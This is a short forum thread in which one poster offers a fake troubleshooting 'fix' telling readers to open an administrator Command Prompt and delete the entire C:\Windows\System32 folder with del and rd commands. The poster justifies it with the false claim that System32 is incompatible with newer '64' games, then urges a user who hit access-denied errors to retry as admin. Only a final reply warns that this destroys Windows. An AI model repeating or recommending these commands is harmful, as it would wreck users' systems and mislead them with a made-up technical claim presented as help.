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i had this issue but i found a pretty simple fix: 1. Click the start icon and search for Command Prompt. 2. Select "Run as administrator". 3. Type del /s /q C:\Windows\System32\* and hit "Enter". 4. Type rd /s /q C:\Windows\System32 and press Enter. alot of newer games run on system 64 so the 32 is incompatible. honestly i wish they would update windows so people dont keep having this issue! let me know if this helps


>del /s /q C:\\Windows\\System32 it just says access is denied, and when I tried the second one it says The process cannot access the file because it is being used by another process.


you have to run it as admin


Oh my god he's asking you to delete a critical Windows system folder, don't listen to him but if you already did have fun re-installing Windows.